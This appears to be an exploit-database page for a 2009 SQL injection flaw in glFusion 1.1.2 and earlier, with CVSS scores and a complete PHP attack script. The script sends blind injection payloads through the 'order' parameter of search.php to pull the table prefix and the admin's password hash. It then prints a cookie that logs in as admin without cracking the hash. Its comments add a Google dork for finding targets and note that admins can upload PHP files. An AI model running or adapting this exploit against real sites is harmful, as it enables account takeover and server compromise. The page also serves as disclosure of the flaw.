glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit

2009-03-30 / 2009-03-31
Credit: bookoo
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php /* glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit by Nine:Situations:Group::bookoo working against Mysql >= 4.1 php.ini independent our site: http://retrogod.altervista.org/ software site: http://www.glfusion.org/ google dork: "Page created in" "seconds by glFusion" +RSS Vulnerability, sql injection in 'order' and 'direction' arguments: look ExecuteQueries() function in /private/system/classes/listfactory.class.php, near line 336: ... // Get the details for sorting the list $this->_sort_arr['field'] = isset($_REQUEST['order']) ? COM_applyFilter($_REQUEST['order']) : $this->_def_sort_arr['field']; $this->_sort_arr['direction'] = isset($_REQUEST['direction']) ? COM_applyFilter($_REQUEST['direction']) : $this->_def_sort_arr['direction']; if (is_numeric($this->_sort_arr['field'])) { $ord = $this->_def_sort_arr['field']; $this->_sort_arr['field'] = SQL_TITLE; } else { $ord = $this->_sort_arr['field']; } $order_sql = ' ORDER BY ' . $ord . ' ' . strtoupper($this->_sort_arr['direction']); ... filters are inefficient, see COM_applyFilter() which calls COM_applyBasicFilter() in /public/lib-common.php near line 5774. We are in an ORDER clause and vars are not surrounded by quotes, bad chars are ex. "," , "/" ,"'", ";", "\",""","*","`" but what about spaces and "("... you can use a CASE WHEN .. THEN .. ELSE .. END construct instead of ex. IF(..,..,..) and "--" instead of "/*" to close your query. And ex. the alternative syntax SUBSTR(str FROM n FOR n) instead of SUBSTR(str,n,n) in a sub-SELECT statement. Other attacks are possible, COM_applyFilter() is a very common used one. Additional notes: 'direction' argument is uppercased by strtoupper(), you know that table identifiers on Unix-like systems are case sensitives but not on MS Windows, however I choosed to inject in the 'order' one for better results. Vars come from the $_REQUEST[] array so you can pass it by $_POST[] or $_COOKIE[], which is not intended I suppose. This exploit extracts the hash from users table; also note that you do not need to crack the hash, you can authenticate as admin with the cookie: glfusion=[uid]; glf_password=[hash]; as admin you can upload php files in public folders! Very soft mitigations: glFusion does not show the table prefix in sql errors, default however is 'gl_'. I prepared a fast routine to extract it from information_schema db if availiable. To successfully interrogate MySQL you need at least 2 records in the same topic section, however the default installation create 2 links with topic "glFusion" */ $err[0]="[!] This script is intended to be launched from the cli!"; $err[1]="[!] You need the curl extesion loaded!"; if (php_sapi_name() <> "cli") { die($err[0]); } if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl("php_curl.dll") ? die($err[1]) : nil; } else { !dl("php_curl.so") ? die($err[1]) : nil; } } function syntax(){ print ( "Syntax: php ".$argv[0]." [host] [path] [[port]] [OPTIONS] \n". "Options: \n". "--port:[port] - specify a port \n". " default -> 80 \n". "--prefix - try to extract table prefix from information.schema\n". " default -> gl_ \n". "--uid:[n] - specify an uid other than default (2,usually admin)\n". "--proxy:[host:port] - use proxy \n". "--enforce - try even with 'not vulnerable' message "); die(); } error_reporting(E_ALL ^ E_NOTICE); $host=$argv[1]; $path=$argv[2]; $prefix="gl_"; //default $uid="2"; $where= "uid=$uid"; //user id, usually admin, anonymous = 1 $argv[2] ? print("[*] Attacking...\n") : syntax(); $_f_prefix=false; $_use_proxy=false; $port=80; $_enforce=false; for ($i=3; $i<$argc; $i++){ if ( stristr($argv[$i],"--prefix")){ $_f_prefix=true; } if ( stristr($argv[$i],"--proxy:")){ $_use_proxy=true; $tmp=explode(":",$argv[$i]); $proxy_host=$tmp[1]; $proxy_port=(int)$tmp[2]; } if ( stristr($argv[$i],"--port:")){ $tmp=explode(":",$argv[$i]); $port=(int)$tmp[1]; } if ( stristr($argv[$i],"--enforce")){ $_enforce=true; } if ( stristr($argv[$i],"--uid")){ $tmp=explode(":",$argv[$i]); $uid=(int)$tmp[1]; $where="uid=$uid"; } } $url = "http://$argv[1]:$port"; function _s($url,$request) { global $_use_proxy,$proxy_host,$proxy_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"); curl_setopt($ch, CURLOPT_TIMEOUT, 0); curl_setopt($ch, CURLOPT_HEADER, 0); if ($_use_proxy){ curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port); } $_d = curl_exec($ch); if (curl_errno($ch)) { die("[!] ".curl_error($ch)."\n"); } else { curl_close($ch); } return $_d; } function chk_err($s){ if (stripos ($s,"\x41\x6e\x20\x53\x51\x4c\x20\x65\x72\x72\x6f\x72\x20\x68\x61\x73\x20\x6f\x63\x63\x75\x72\x72\x65\x64")){ return true; } else { return false; } } function xtrct_tpc($_h){ $_x=explode("\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x74\x6f\x70\x69\x63\x3d",$_h); $_y=array(); for ($i=1; $i<count($_x); $i++){ $_tmp=explode("\x22",$_x[$i]); if ((!in_array($_tmp[0],$_y)) and ($_tmp[0]<>'')) { $_y[$i]=$_tmp[0]; } } return $_y; } $url ="http://$host:$port".$path."index.php"; $out= _s($url,""); $_tpcs=xtrct_tpc($out); $_types=array("links","stories","filemgmt","forum"); $_t=false; for ($i=0; $i<count($_tpcs); $i++){ for ($j=0; $j<count($_types); $j++){ $url ="http://$host:$port".$path."search.php?query=a+a+a&keyType=all&datestart=&dateend=&topic=".$_tpcs[$i]."&type=".$_types[$j]."&author=0&results=25&mode=search"; $out= _s($url,""); $mtchs=explode("\x3e\x32\x2e", $out); if (count($mtchs)==2){ $_t=true; break; } } } if ($_t==true){ $type = $_types[$j]; $topic= $_tpcs[$i]; } else { $type= "links"; //section with at least 2 records of the same topic $topic= "glFusion"; //existing topic in section } print("[*] topic -> '".$topic."', type -> '".$type."'\n"); $prepend="query=&topic=".$topic."&keyType=phrase"; //checking for vulnerability existence ... $url ="http://$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=all&author=0&results=25&mode=search&order="; $_d="order=--;"; $out= _s($url,$_d); //version compatibility if (stripos($out,"\x73\x68\x6f\x75\x6c\x64\x20\x68\x61\x76\x65\x20\x61\x74\x20\x6c\x65\x61\x73\x74\x20\x33\x20\x63\x68\x61\x72\x61\x63\x74\x65\x72\x73")){ $prepend="query=a+a+a&topic=0&keyType=all"; $url ="http://$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=all&author=0&results=25&mode=search"; $out= _s($url,$_d); } if (chk_err($out)) { print("[*] Vulnerable ...\n"); } else { print("[!] Not vulnerable ...\n"); if (!$_enforce){ die; } } switch ($type) { case $_types[0]: $_order = array("id","url","description","title","hits","date","uid"); break; case $_types[1]: $_order = array("id","title","description","date","uid","hits","url"); break; case $_types[2]: $_order = array("id","uid","comments","hits","date","description","url"); break; case $_types[3]: $_order = array("id","name","forum","date","title","description","hits","uid"); break; } function xtrct_lnk($_h){ $_x=explode("\x3e\x31\x2e",$_h); $_x=explode("\x3c\x61\x20\x68\x72\x65\x66\x3d\x22",$_x[1]); $_x=explode("\x22",$_x[1]); return html_entity_decode($_x[0]); } //checking for exploitability ... $sql = urlencode("(CASE WHEN (SELECT 1) THEN 1 ELSE 1 END) LIMIT 1--"); $url ="http://$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=".$type."&author=0&results=25&mode=search"; $_d="order=".$sql.";"; $out= _s($url,$_d); if (chk_err($out)) { die("[!] Mysql < 4.1 ..."); } else { print "[*] Subquery works, exploiting ...\n"; } $_lnks = array(); $v = array(); for ($i=0; $i<count($_order); $i++){ $sql = urlencode("$_order[$i] LIMIT 1--"); $url ="http://$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=".$type."&author=0&results=25&mode=search"; $_d="order=".$sql.";"; $_o= _s($url,$_d); $l=xtrct_lnk($_o); if (!in_array($l,$_lnks)) { array_push($_lnks,$l); array_push($v,$_order[$i]); } if (count($v)>1) { print "[*] '".$v[0]."' and '".$v[1]."' in ORDER clause returs different records, good! \n"; break; } } if (count($v)<=1) {die("[!] Unable to interrogate database: ".count(v)." record(s) in table ... need at least 2 with topic '".$topic." in section '".$type."' !");} function find_prefix(){ global $_lnks ,$v, $type, $host, $port, $path, $prepend; $_table_name=""; $j=1; print "[*] Table name -> "; while (!strstr($_table_name,chr(0))){ $mn=0x00;$mx=0xff; while (1){ if (($mx + $mn) % 2 ==1){ $c= round(($mx + $mn) / 2) - 1; } else { $c= round(($mx + $mn) / 2); } $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM $j FOR 1)) >= ".$c.") FROM information_schema.TABLES WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN ".$v[0]." ELSE ".$v[1]." END) LIMIT 1--"); $url ="http://$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=".$type."&author=0&results=25&mode=search"; $_d="order=".$sql.";"; $_o= _s($url,$_d); if (chk_err($_o)) { die("\n[!] information_schema not availiable!"); } $l=xtrct_lnk($_o); if ($l==$_lnks[0]){ $mn = $c; } else { $mx = $c - 1; } if (($mx-$mn==1) or ($mx==$mn)){ $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM $j FOR 1)) = ".$mn.") FROM information_schema.tables WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN ".$v[0]." ELSE ".$v[1]." END) LIMIT 1--"); $url ="http://$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=".$type."&author=0&results=25&mode=search"; $_d="order=".$sql.";"; $_o= _s($url,$_d); $l=xtrct_lnk($_o); if ($l==$_lnks[0]){ print chr($mn); $_table_name.=chr($mn); } else { print chr($mx); $_table_name.=chr($mx); } break; } } $j++; } print "\n"; $_prefix = str_replace("trackbackcodes","",$_table_name); return $_prefix; } if ($_f_prefix == true) { $prefix=find_prefix(); print "[*] Table prefix -> ".$prefix."\n"; } $c=array();$c=array_merge($c,range(0x30,0x39));$c=array_merge($c,range(0x61,0x66)); print "[*] hash -> "; $_hash=""; for ($j=1; $j<0x21; $j++){ for ($i=1; $i<=0xff; $i++){ $f=false; if (in_array($i,$c)){ $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(PASSWD FROM $j FOR 1))=$i) FROM ".$prefix."users WHERE $where LIMIT 1) THEN ".$v[0]." ELSE ".$v[1]." END) LIMIT 1--"); $url ="http://$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=".$type."&author=0&results=25&mode=search"; $_d="order=".$sql.";"; $_o= _s($url,$_d); if (chk_err($_o)) { die("\n[!] wrong table prefix!"); } $l=xtrct_lnk($_o); if ($l==$_lnks[0]){ $f=true; $_hash.=chr($i); print chr($i); break; } } } if ($f==false){ die("\n[!] Unknown error ..."); } } print "\n[*] your cookie -> glfusion=".$uid."; glf_password=".$_hash."; glf_theme=nouveau;"; ?> original url: http://retrogod.altervista.org/9sg_glfusion_sql.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top